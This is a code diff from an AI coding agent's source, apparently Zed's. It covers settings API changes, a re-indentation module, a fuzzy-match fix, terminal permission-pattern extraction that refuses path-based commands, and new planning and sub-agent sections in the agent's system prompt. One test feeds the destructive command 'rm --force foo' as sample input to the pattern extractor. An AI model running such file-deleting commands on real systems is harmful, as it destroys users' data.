true, ), project, judge_model, diff --git a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs index 607daa8ce3a129e0f4bc53a00d1a62f479da3932..198ab45b13faef814e5964892e02e4c9d60de5b0 100644 --- a/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs +++ b/crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs @@ -550,7 +550,7 @@ impl Default for EditorStyle { } pub fn make_inlay_hints_style(cx: &mut App) -> HighlightStyle { - let show_background = language_settings::language_settings(None, None, cx) + let show_background = language_settings::language_settings(cx).get() .inlay_hints .show_background; @@ -5989,7 +5989,7 @@ impl Editor { let file = buffer.file(); - if !language_settings(buffer.language().map(|l| l.name()), file, cx).show_edit_predictions { + if !language_settings(cx).buffer(buffer).get().show_edit_predictions { return EditPredictionSettings::Disabled; }; @@ -7837,7 +7837,7 @@ impl Editor { h_flex() .px_0p5() .when(is_platform_style_mac, |parent| parent.gap_0p5()) - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) .text_size(TextSize::XSmall.rems(cx)) .child(h_flex().children(ui::render_modifiers( &accept_keystroke.modifiers, @@ -8149,7 +8149,7 @@ impl Editor { .px_2() .child( h_flex() - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) .when(is_platform_style_mac, |parent| parent.gap_1()) .child(h_flex().children(ui::render_modifiers( &accept_keystroke.modifiers, @@ -8258,7 +8258,7 @@ impl Editor { .gap_2() .pr_1() .overflow_x_hidden() - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme_settings::ThemeSettings::get_global(cx).buffer_font.clone()) .child(left) .child(preview), ) @@ -11922,6 +11922,7 
@@ impl Editor { scroll_anchor: scroll_state, scroll_top_row, }), + Some(cursor_position.row), cx, ); cx.emit(EditorEvent::PushedToNavHistory { @@ -18800,7 +18801,7 @@ fn choose_completion_range( } = &completion.source { let completion_mode_setting = - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) + language_settings(cx).buffer(buffer).get() .completions .lsp_insert_mode; @@ -19849,7 +19850,7 @@ fn inlay_hint_settings( ) -> InlayHintSettings { let file = snapshot.file_at(location); let language = snapshot.language_at(location).map(|l| l.name()); - language_settings(language, file, cx).inlay_hints + language_settings(cx).language(language).file(file).get().inlay_hints } fn consume_contiguous_rows( diff --git a/crates/agent/src/edit_agent/reindent.rs b/crates/agent/src/edit_agent/reindent.rs new file mode 100644 index 0000000000000000000000000000000000000000..7f08749e475f6acfcf63013abd9139574112e4b5 --- /dev/null +++ b/crates/agent/src/edit_agent/reindent.rs @@ -0,0 +1,214 @@ +use language::LineIndent; +use std::{cmp, iter}; + +#[derive(Copy, Clone, Debug)] +pub enum IndentDelta { + Spaces(isize), + Tabs(isize), +} + +impl IndentDelta { + pub fn character(&self) -> char { + match self { + IndentDelta::Spaces(_) => ' ', + IndentDelta::Tabs(_) => '\t', + } + } + + pub fn len(&self) -> isize { + match self { + IndentDelta::Spaces(n) => *n, + IndentDelta::Tabs(n) => *n, + } + } +} + +pub fn compute_indent_delta(buffer_indent: LineIndent, query_indent: LineIndent) -> IndentDelta { + if buffer_indent.tabs > 0 { + IndentDelta::Tabs(buffer_indent.tabs as isize - query_indent.tabs as isize) + } else { + IndentDelta::Spaces(buffer_indent.spaces as isize - query_indent.spaces as isize) + } +} + +/// Synchronous re-indentation adapter. Buffers incomplete lines and applies +/// an `IndentDelta` to each line's leading whitespace before emitting it. 
+pub struct Reindenter { + delta: IndentDelta, + buffer: String, + in_leading_whitespace: bool, +} + +impl Reindenter { + pub fn new(delta: IndentDelta) -> Self { + Self { + delta, + buffer: String::new(), + in_leading_whitespace: true, + } + } + + /// Feed a chunk of text and return the re-indented portion that is + /// ready to emit. Incomplete trailing lines are buffered internally. + pub fn push(&mut self, chunk: &str) -> String { + self.buffer.push_str(chunk); + self.drain(false) + } + + /// Flush any remaining buffered content (call when the stream is done). + pub fn finish(&mut self) -> String { + self.drain(true) + } + + fn drain(&mut self, is_final: bool) -> String { + let mut indented = String::new(); + let mut start_ix = 0; + let mut newlines = self.buffer.match_indices('\n'); + loop { + let (line_end, is_pending_line) = match newlines.next() { + Some((ix, _)) => (ix, false), + None => (self.buffer.len(), true), + }; + let line = &self.buffer[start_ix..line_end]; + + if self.in_leading_whitespace { + if let Some(non_whitespace_ix) = line.find(|c| self.delta.character() != c) { + // We found a non-whitespace character, adjust indentation + // based on the delta. + let new_indent_len = + cmp::max(0, non_whitespace_ix as isize + self.delta.len()) as usize; + indented.extend(iter::repeat(self.delta.character()).take(new_indent_len)); + indented.push_str(&line[non_whitespace_ix..]); + self.in_leading_whitespace = false; + } else if is_pending_line && !is_final { + // We're still in leading whitespace and this line is incomplete. + // Stop processing until we receive more input. + break; + } else { + // This line is entirely whitespace. Push it without indentation. 
+ indented.push_str(line); + } + } else { + indented.push_str(line); + } + + if is_pending_line { + start_ix = line_end; + break; + } else { + self.in_leading_whitespace = true; + indented.push('\n'); + start_ix = line_end + 1; + } + } + self.buffer.replace_range(..start_ix, ""); + if is_final { + indented.push_str(&self.buffer); + self.buffer.clear(); + } + indented + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_indent_single_chunk() { + let mut r = Reindenter::new(IndentDelta::Spaces(2)); + let out = r.push(" abc\n def\n ghi"); + // All three lines are emitted: "ghi" starts with spaces but + // contains non-whitespace, so it's processed immediately. + assert_eq!(out, " abc\n def\n ghi"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_outdent_tabs() { + let mut r = Reindenter::new(IndentDelta::Tabs(-2)); + let out = r.push("\t\t\t\tabc\n\t\tdef\n\t\t\t\t\t\tghi"); + assert_eq!(out, "\t\tabc\ndef\n\t\t\t\tghi"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_incremental_chunks() { + let mut r = Reindenter::new(IndentDelta::Spaces(2)); + // Feed " ab" — the `a` is non-whitespace, so the line is + // processed immediately even without a trailing newline. + let out = r.push(" ab"); + assert_eq!(out, " ab"); + // Feed "c\n" — appended to the already-processed line (no longer + // in leading whitespace). + let out = r.push("c\n"); + assert_eq!(out, "c\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_zero_delta() { + let mut r = Reindenter::new(IndentDelta::Spaces(0)); + let out = r.push(" hello\n world\n"); + assert_eq!(out, " hello\n world\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_clamp_negative_indent() { + let mut r = Reindenter::new(IndentDelta::Spaces(-10)); + let out = r.push(" abc\n"); + // max(0, 2 - 10) = 0, so no leading spaces. 
+ assert_eq!(out, "abc\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_whitespace_only_lines() { + let mut r = Reindenter::new(IndentDelta::Spaces(2)); + let out = r.push(" \n code\n"); + // First line is all whitespace — emitted verbatim. Second line is indented. + assert_eq!(out, " \n code\n"); + let out = r.finish(); + assert_eq!(out, ""); + } + + #[test] + fn test_compute_indent_delta_spaces() { + let buffer = LineIndent { + tabs: 0, + spaces: 8, + line_blank: false, + }; + let query = LineIndent { + tabs: 0, + spaces: 4, + line_blank: false, + }; + let delta = compute_indent_delta(buffer, query); + assert_eq!(delta.len(), 4); + assert_eq!(delta.character(), ' '); + } + + #[test] + fn test_compute_indent_delta_tabs() { + let buffer = LineIndent { + tabs: 2, + spaces: 0, + line_blank: false, + }; + let query = LineIndent { + tabs: 3, + spaces: 0, + line_blank: false, + }; + let delta = compute_indent_delta(buffer, query); + assert_eq!(delta.len(), -1); + assert_eq!(delta.character(), '\t'); + } +} diff --git a/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs b/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs index 1ce2ca6f361a7e8186711d35d4dc640b8f13ce5a..e6a56099a293215050fa082a0432f216754473af 100644 --- a/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs +++ b/crates/agent/src/edit_agent/streaming_fuzzy_matcher.rs @@ -72,6 +72,18 @@ impl StreamingFuzzyMatcher { pub fn finish(&mut self) -> Vec> { // Process any remaining incomplete line if !self.incomplete_line.is_empty() { + if self.matches.len() == 1 { + let range = &mut self.matches[0]; + if range.end < self.snapshot.len() + && self + .snapshot + .contains_str_at(range.end + 1, &self.incomplete_line) + { + range.end += 1 + self.incomplete_line.len(); + return self.matches.clone(); + } + } + self.query_lines.push(self.incomplete_line.clone()); self.incomplete_line.clear(); self.matches = self.resolve_location_fuzzy(); @@ -722,6 +734,54 @@ mod tests { ); } + 
#[gpui::test] + fn test_prefix_of_last_line_resolves_to_correct_range() { + let text = indoc! {r#" + fn on_query_change(&mut self, cx: &mut Context) { + self.filter(cx); + } + + + + fn render_search(&self, cx: &mut Context) -> Div { + div() + } + "#}; + + let buffer = TextBuffer::new( + ReplicaId::LOCAL, + BufferId::new(1).unwrap(), + text.to_string(), + ); + let snapshot = buffer.snapshot(); + + // Query with a partial last line. + let query = "}\n\n\n\nfn render_search"; + + let mut matcher = StreamingFuzzyMatcher::new(snapshot.clone()); + matcher.push(query, None); + let matches = matcher.finish(); + + // The match should include the line containing "fn render_search". + let matched_text = matches + .first() + .map(|range| snapshot.text_for_range(range.clone()).collect::()); + + assert!( + matches.len() == 1, + "Expected exactly one match, got {}: {:?}", + matches.len(), + matched_text, + ); + + let matched_text = matched_text.unwrap(); + pretty_assertions::assert_eq!( + matched_text, + "}\n\n\n\nfn render_search", + "Match should include the render_search line", + ); + } + #[track_caller] fn assert_location_resolution(text_with_expected_range: &str, query: &str, rng: &mut StdRng) { let (text, expected_ranges) = marked_text_ranges(text_with_expected_range, false); diff --git a/crates/agent/src/native_agent_server.rs b/crates/agent/src/native_agent_server.rs index 18c41670ac4b4ba3146fb207992a7020a44fbd5f..7f19f9005e3ff54e361f57075b7af06508476564 100644 --- a/crates/agent/src/native_agent_server.rs +++ b/crates/agent/src/native_agent_server.rs @@ -6,7 +6,8 @@ use agent_settings::AgentSettings; use anyhow::Result; use collections::HashSet; use fs::Fs; -use gpui::{App, Entity, SharedString, Task}; +use gpui::{App, Entity, Task}; +use project::{AgentId, Project}; use prompt_store::PromptStore; use settings::{LanguageModelSelection, Settings as _, update_settings_file}; @@ -25,8 +26,8 @@ impl NativeAgentServer { } impl AgentServer for NativeAgentServer { - fn 
name(&self) -> SharedString { - "Zed Agent".into() + fn agent_id(&self) -> AgentId { + crate::ZED_AGENT_ID.clone() } fn logo(&self) -> ui::IconName { @@ -35,11 +36,11 @@ impl AgentServer for NativeAgentServer { fn connect( &self, - delegate: AgentServerDelegate, + _delegate: AgentServerDelegate, + _project: Entity, cx: &mut App, ) -> Task>> { log::debug!("NativeAgentServer::connect"); - let project = delegate.project().clone(); let fs = self.fs.clone(); let thread_store = self.thread_store.clone(); let prompt_store = PromptStore::global(cx); @@ -49,9 +50,8 @@ impl AgentServer for NativeAgentServer { let prompt_store = prompt_store.await?; log::debug!("Creating native agent entity"); - let agent = - NativeAgent::new(project, thread_store, templates, Some(prompt_store), fs, cx) - .await?; + let agent = cx + .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx)); // Create the connection wrapper let connection = NativeAgentConnection(agent); diff --git a/crates/agent/src/pattern_extraction.rs b/crates/agent/src/pattern_extraction.rs index 69a7abae32d6df9c2755e53292ab1c1a1b5341de..7015d69827d7286a1564ce0528ce4627059c49fb 100644 --- a/crates/agent/src/pattern_extraction.rs +++ b/crates/agent/src/pattern_extraction.rs @@ -1,4 +1,5 @@ -use shell_command_parser::extract_commands; +use acp_thread::PermissionPattern; +use shell_command_parser::{extract_commands, extract_terminal_command_prefix}; use std::path::{Path, PathBuf}; use url::Url; @@ -18,8 +19,8 @@ fn is_plain_command_token(token: &str) -> bool { } struct CommandPrefix { - command: String, - subcommand: Option, + normalized_tokens: Vec, + display: String, } /// Extracts the command name and optional subcommand from a shell command using @@ -30,59 +31,83 @@ struct CommandPrefix { /// syntax correctly. Returns `None` if parsing fails or if the command name /// contains path separators (for security reasons). 
fn extract_command_prefix(command: &str) -> Option { - let commands = extract_commands(command)?; - let first_command = commands.first()?; + let prefix = extract_terminal_command_prefix(command)?; - let mut tokens = first_command.split_whitespace(); - let first_token = tokens.next()?; - - // Only allow alphanumeric commands with hyphens/underscores. - // Reject paths like "./script.sh" or "/usr/bin/python" to prevent - // users from accidentally allowing arbitrary script execution. - if !is_plain_command_token(first_token) { + if !is_plain_command_token(&prefix.command) { return None; } - // Include the subcommand (second non-flag token) when present, to produce - // more specific patterns like "cargo test" instead of just "cargo". - let subcommand = tokens - .next() - .filter(|second_token| is_plain_command_token(second_token)) - .map(|second_token| second_token.to_string()); - Some(CommandPrefix { - command: first_token.to_string(), - subcommand, + normalized_tokens: prefix.tokens, + display: prefix.display, }) } -/// Extracts a regex pattern from a terminal command based on the first token (command name). +/// Extracts a regex pattern and display name from a terminal command. /// /// Returns `None` for commands starting with `./`, `/`, or other path-like prefixes. /// This is a deliberate security decision: we only allow pattern-based "always allow" /// rules for well-known command names (like `cargo`, `npm`, `git`), not for arbitrary /// scripts or absolute paths which could be manipulated by an attacker. 
+pub fn extract_terminal_permission_pattern(command: &str) -> Option { + let pattern = extract_terminal_pattern(command)?; + let display_name = extract_terminal_pattern_display(command)?; + Some(PermissionPattern { + pattern, + display_name, + }) +} + pub fn extract_terminal_pattern(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - let escaped_command = regex::escape(&prefix.command); - Some(match &prefix.subcommand { - Some(subcommand) => { - format!( - "^{}\\s+{}(\\s|$)", - escaped_command, - regex::escape(subcommand) - ) - } - None => format!("^{}\\b", escaped_command), - }) + let tokens = prefix.normalized_tokens; + + match tokens.as_slice() { + [] => None, + [single] => Some(format!("^{}\\b", regex::escape(single))), + [rest @ .., last] => Some(format!( + "^{}\\s+{}(\\s|$)", + rest.iter() + .map(|token| regex::escape(token)) + .collect::>() + .join("\\s+"), + regex::escape(last) + )), + } } pub fn extract_terminal_pattern_display(command: &str) -> Option { let prefix = extract_command_prefix(command)?; - match prefix.subcommand { - Some(subcommand) => Some(format!("{} {}", prefix.command, subcommand)), - None => Some(prefix.command), + Some(prefix.display) +} + +/// Extracts patterns for ALL commands in a pipeline, not just the first one. +/// +/// For a command like `"cargo test 2>&1 | tail"`, this returns patterns for +/// both `cargo` and `tail`. Path-based commands (e.g. `./script.sh`) are +/// filtered out, and duplicate command names are deduplicated while preserving +/// order. 
+pub fn extract_all_terminal_patterns(command: &str) -> Vec { + let commands = match extract_commands(command) { + Some(commands) => commands, + None => return Vec::new(), + }; + + let mut results = Vec::new(); + + for cmd in &commands { + let Some(permission_pattern) = extract_terminal_permission_pattern(cmd) else { + continue; + }; + + if results.contains(&permission_pattern) { + continue; + } + + results.push(permission_pattern); } + + results } pub fn extract_path_pattern(path: &str) -> Option { @@ -208,9 +233,24 @@ mod tests { assert!(!pattern.is_match("cargo build-foo")); assert!(!pattern.is_match("cargo builder")); + // Env-var prefixes are included in generated patterns + assert_eq!( + extract_terminal_pattern("PAGER=blah git log --oneline"), + Some("^PAGER=blah\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("A=1 B=2 git log"), + Some("^A=1\\s+B=2\\s+git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern("PAGER='less -R' git log"), + Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string()) + ); + // Path-like commands are rejected assert_eq!(extract_terminal_pattern("./script.sh arg"), None); assert_eq!(extract_terminal_pattern("/usr/bin/python arg"), None); + assert_eq!(extract_terminal_pattern("PAGER=blah ./script.sh arg"), None); } #[test] @@ -235,6 +275,74 @@ mod tests { extract_terminal_pattern_display("ls"), Some("ls".to_string()) ); + assert_eq!( + extract_terminal_pattern_display("PAGER=blah git log --oneline"), + Some("PAGER=blah git log".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("PAGER='less -R' git log"), + Some("PAGER='less -R' git log".to_string()) + ); + } + + #[test] + fn test_terminal_pattern_regex_normalizes_whitespace() { + let pattern = extract_terminal_pattern("PAGER=blah git log --oneline") + .expect("expected terminal pattern"); + let regex = regex::Regex::new(&pattern).expect("expected valid regex"); + + assert!(regex.is_match("PAGER=blah git log")); 
+ assert!(regex.is_match("PAGER=blah git log --stat")); + } + + #[test] + fn test_extract_terminal_pattern_skips_redirects_before_subcommand() { + assert_eq!( + extract_terminal_pattern("git 2>/dev/null log --oneline"), + Some("^git\\s+log(\\s|$)".to_string()) + ); + assert_eq!( + extract_terminal_pattern_display("git 2>/dev/null log --oneline"), + Some("git 2>/dev/null log".to_string()) + ); + + assert_eq!( + extract_terminal_pattern("rm --force foo"), + Some("^rm\\b".to_string()) + ); + } + + #[test] + fn test_extract_all_terminal_patterns_pipeline() { + assert_eq!( + extract_all_terminal_patterns("cargo test 2>&1 | tail"), + vec![ + PermissionPattern { + pattern: "^cargo\\s+test(\\s|$)".to_string(), + display_name: "cargo test".to_string(), + }, + PermissionPattern { + pattern: "^tail\\b".to_string(), + display_name: "tail".to_string(), + }, + ] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_with_path_commands() { + assert_eq!( + extract_all_terminal_patterns("./script.sh | grep foo"), + vec![PermissionPattern { + pattern: "^grep\\s+foo(\\s|$)".to_string(), + display_name: "grep foo".to_string(), + }] + ); + } + + #[test] + fn test_extract_all_terminal_patterns_all_paths() { + assert_eq!(extract_all_terminal_patterns("./a.sh | /usr/bin/b"), vec![]); } #[test] diff --git a/crates/agent/src/templates.rs b/crates/agent/src/templates.rs index db787d834e63746fdbea9e837f4fd0615f85c984..103fde17fd4d865b346a428e1f23e335005afe88 100644 --- a/crates/agent/src/templates.rs +++ b/crates/agent/src/templates.rs @@ -85,6 +85,7 @@ mod tests { let templates = Templates::new(); let rendered = template.render(&templates).unwrap(); assert!(rendered.contains("## Fixing Diagnostics")); + assert!(!rendered.contains("## Planning")); assert!(rendered.contains("test-model")); } } diff --git a/crates/agent/src/templates/system_prompt.hbs b/crates/agent/src/templates/system_prompt.hbs index 48e3e586a84438ca9b97f94a24f3710bfc3360b6..67c920707289173ac4c7c1c9d98a8cd64126eb89 
100644 --- a/crates/agent/src/templates/system_prompt.hbs +++ b/crates/agent/src/templates/system_prompt.hbs @@ -20,6 +20,34 @@ You are a highly skilled software engineer with extensive knowledge in many prog - When running commands that may run indefinitely or for a long time (such as build scripts, tests, servers, or file watchers), specify `timeout_ms` to bound runtime. If the command times out, the user can always ask you to run it again with a longer timeout or no timeout if they're willing to wait or cancel manually. - Avoid HTML entity escaping - use plain characters instead. +{{#if (contains available_tools 'update_plan') }} +## Planning + +- You have access to an `update_plan` tool which tracks steps and progress and renders them to the user. +- Use it to show that you've understood the task and to make complex, ambiguous, or multi-phase work easier for the user to follow. +- A good plan breaks the work into meaningful, logically ordered steps that are easy to verify as you go. +- When writing a plan, prefer a short list of concise, concrete steps. +- Keep each step focused on a real unit of work and use short 1-sentence descriptions. +- Do not use plans for simple or single-step queries that you can just do or answer immediately. +- Do not use plans to pad your response with filler steps or to state the obvious. +- Do not include steps that you are not actually capable of doing. +- After calling `update_plan`, do not repeat the full plan in your response. The UI already displays it. Instead, briefly summarize what changed and note any important context or next step. +- Before moving on to a new phase of work, mark the previous step as completed when appropriate. +- When work is in progress, prefer having exactly one step marked as `in_progress`. +- You can mark multiple completed steps in a single `update_plan` call. +- If the task changes midway through, update the plan so it reflects the new approach. 
+ +Use a plan when: + +- The task is non-trivial and will require multiple actions over a longer horizon. +- There are logical phases or dependencies where sequencing matters. +- The work has ambiguity that benefits from outlining high-level goals. +- You want intermediate checkpoints for feedback and validation. +- The user asked you to do more than one thing in a single prompt. +- The user asked you to use the plan tool or TODOs. +- You discover additional steps while working and intend to complete them before yielding to the user. + +{{/if}} ## Searching and Reading If you are unsure how to fulfill the user's request, gather more information with tool calls and/or clarifying questions. @@ -146,6 +174,22 @@ Otherwise, follow debugging best practices: 2. When selecting which version of an API or package to use, choose one that is compatible with the user's dependency management file(s). If no such file exists or if the package is not present, use the latest version that is in your training data. 3. If an external API requires an API Key, be sure to point this out to the user. Adhere to best security practices (e.g. DO NOT hardcode an API key in a place where it can be exposed) +{{#if (contains available_tools 'spawn_agent') }} +## Multi-agent delegation +Sub-agents can help you move faster on large tasks when you use them thoughtfully. This is most useful for: +* Very large tasks with multiple well-defined scopes +* Plans with multiple independent steps that can be executed in parallel +* Independent information-gathering tasks that can be done in parallel +* Requesting a review from another agent on your work or another agent's work +* Getting a fresh perspective on a difficult design or debugging question +* Running tests or config commands that can output a large amount of logs when you want a concise summary. Because you only receive the subagent's final message, ask it to include the relevant failing lines or diagnostics in its response. 
+ +When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. If multiple agents might edit files, assign them disjoint write scopes. + +This feature must be used wisely. For simple or straightforward tasks, prefer doing the work directly instead of spawning a new agent. + +{{/if}} + ## System Information Operating System: {{os}} diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs index 069bf0349299e6f4952f673cbf7607e52d48d9c5..b5ce6441e790e0b79b2798dfe0008cc74eec69b8 100644 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ b/crates/agent/src/tests/edit_file_thread_test.rs @@ -50,9 +50,9 @@ async fn test_edit_file_tool_in_thread_context(cx: &mut TestAppContext) { // Add just the tools we need for this test let language_registry = project.read(cx).languages().clone(); thread.add_tool(crate::ReadFileTool::new( - cx.weak_entity(), project.clone(), thread.action_log().clone(), + true, )); thread.add_tool(crate::EditFileTool::new( project.clone(), @@ -202,3 +202,214 @@ async fn test_edit_file_tool_in_thread_context(cx: &mut TestAppContext) { ); }); } + +#[gpui::test] +async fn test_streaming_edit_json_parse_error_does_not_cause_unsaved_changes( + cx: &mut TestAppContext, +) { + super::init_test(cx); + super::always_allow_tools(cx); + + // Enable the streaming edit file tool feature flag. 
+ cx.update(|cx| { + cx.update_flags(true, vec!["streaming-edit-file-tool".to_string()]); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "src": { + "main.rs": "fn main() {\n println!(\"Hello, world!\");\n}\n" + } + }), + ) + .await; + + let project = project::Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; + let project_context = cx.new(|_cx| ProjectContext::default()); + let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); + let context_server_registry = + cx.new(|cx| crate::ContextServerRegistry::new(context_server_store.clone(), cx)); + let model = Arc::new(FakeLanguageModel::default()); + model.as_fake().set_supports_streaming_tools(true); + let fake_model = model.as_fake(); + + let thread = cx.new(|cx| { + let mut thread = crate::Thread::new( + project.clone(), + project_context, + context_server_registry, + crate::Templates::new(), + Some(model.clone()), + cx, + ); + let language_registry = project.read(cx).languages().clone(); + thread.add_tool(crate::StreamingEditFileTool::new( + project.clone(), + cx.weak_entity(), + thread.action_log().clone(), + language_registry, + )); + thread + }); + + let _events = thread + .update(cx, |thread, cx| { + thread.send( + UserMessageId::new(), + ["Write new content to src/main.rs"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + let tool_use_id = "edit_1"; + let partial_1 = LanguageModelToolUse { + id: tool_use_id.into(), + name: EditFileTool::NAME.into(), + raw_input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write" + }) + .to_string(), + input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write" + }), + is_input_complete: false, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_1)); + cx.run_until_parked(); + + let 
partial_2 = LanguageModelToolUse { + id: tool_use_id.into(), + name: EditFileTool::NAME.into(), + raw_input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() { /* rewritten */ }" + }) + .to_string(), + input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() { /* rewritten */ }" + }), + is_input_complete: false, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(partial_2)); + cx.run_until_parked(); + + // Now send a json parse error. At this point we have started writing content to the buffer. + fake_model.send_last_completion_stream_event( + LanguageModelCompletionEvent::ToolUseJsonParseError { + id: tool_use_id.into(), + tool_name: EditFileTool::NAME.into(), + raw_input: r#"{"display_description":"Rewrite main.rs","path":"project/src/main.rs","mode":"write","content":"fn main() { /* rewritten "#.into(), + json_parse_error: "EOF while parsing a string at line 1 column 95".into(), + }, + ); + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + // cx.executor().advance_clock(Duration::from_secs(5)); + // cx.run_until_parked(); + + assert!( + !fake_model.pending_completions().is_empty(), + "Thread should have retried after the error" + ); + + // Respond with a new, well-formed, complete edit_file tool use. 
+ let tool_use = LanguageModelToolUse { + id: "edit_2".into(), + name: EditFileTool::NAME.into(), + raw_input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" + }) + .to_string(), + input: json!({ + "display_description": "Rewrite main.rs", + "path": "project/src/main.rs", + "mode": "write", + "content": "fn main() {\n println!(\"Hello, rewritten!\");\n}\n" + }), + is_input_complete: true, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(tool_use)); + fake_model + .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + let pending_completions = fake_model.pending_completions(); + assert!( + pending_completions.len() == 1, + "Expected only the follow-up completion containing the successful tool result" + ); + + let completion = pending_completions + .into_iter() + .last() + .expect("Expected a completion containing the tool result for edit_2"); + + let tool_result = completion + .messages + .iter() + .flat_map(|msg| &msg.content) + .find_map(|content| match content { + language_model::MessageContent::ToolResult(result) + if result.tool_use_id == language_model::LanguageModelToolUseId::from("edit_2") => + { + Some(result) + } + _ => None, + }) + .expect("Should have a tool result for edit_2"); + + // Ensure that the second tool call completed successfully and edits were applied. 
+ assert!( + !tool_result.is_error, + "Tool result should succeed, got: {:?}", + tool_result + ); + let content_text = match &tool_result.content { + language_model::LanguageModelToolResultContent::Text(t) => t.to_string(), + other => panic!("Expected text content, got: {:?}", other), + }; + assert!( + !content_text.contains("file has been modified since you last read it"), + "Did not expect a stale last-read error, got: {content_text}" + ); + assert!( + !content_text.contains("This file has unsaved changes"), + "Did not expect an unsaved-changes error, got: {content_text}" + ); + + let file_content = fs + .load(path!("/project/src/main.rs").as_ref()) + .await + .expect("file should exist"); + super::assert_eq!( + file_content, + "fn main() {\n println!(\"Hello, rewritten!\");\n}\n", + "The second edit should be applied and saved gracefully" + ); + + fake_model.end_last_completion_stream(); + cx.run_until_parked(); +} diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index 5262414631c7f1f329a7de941424e0a0dfa8b1b9..ff53136a0ded4bbc283fea30598d8d30e6e29709 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -6,8 +6,7 @@ use acp_thread::{ use agent_client_protocol::{self as acp}; use agent_settings::AgentProfileId; use anyhow::Result; -use client::{Client, UserStore}; -use cloud_llm_client::CompletionIntent; +use client::{Client, RefreshLlmTokenListener, UserStore}; use collections::IndexMap; use context_server::{ContextServer, ContextServerCommand, ContextServerId}; use feature_flags::FeatureFlagAppExt as _; @@ -26,8 +25,8 @@ use gpui::{ }; use indoc::indoc; use language_model::{ - LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, - LanguageModelProviderName, LanguageModelRegistry, LanguageModelRequest, + CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelId, LanguageModelProviderName, LanguageModelRegistry, 
LanguageModelRequest, LanguageModelRequestMessage, LanguageModelToolResult, LanguageModelToolSchemaFormat, LanguageModelToolUse, MessageContent, Role, StopReason, TokenUsage, fake_provider::FakeLanguageModel, @@ -48,7 +47,7 @@ use std::{ rc::Rc, sync::{ Arc, - atomic::{AtomicBool, Ordering}, + atomic::{AtomicBool, AtomicUsize, Ordering}, }, time::Duration, }; @@ -58,14 +57,14 @@ mod edit_file_thread_test; mod test_tools; use test_tools::*; -fn init_test(cx: &mut TestAppContext) { +pub(crate) fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); }); } -struct FakeTerminalHandle { +pub(crate) struct FakeTerminalHandle { killed: Arc, stopped_by_user: Arc, exit_sender: std::cell::RefCell>>, @@ -75,7 +74,7 @@ struct FakeTerminalHandle { } impl FakeTerminalHandle { - fn new_never_exits(cx: &mut App) -> Self { + pub(crate) fn new_never_exits(cx: &mut App) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); @@ -99,7 +98,7 @@ impl FakeTerminalHandle { } } - fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { + pub(crate) fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self { let killed = Arc::new(AtomicBool::new(false)); let stopped_by_user = Arc::new(AtomicBool::new(false)); let (exit_sender, _exit_receiver) = futures::channel::oneshot::channel(); @@ -118,15 +117,15 @@ impl FakeTerminalHandle { } } - fn was_killed(&self) -> 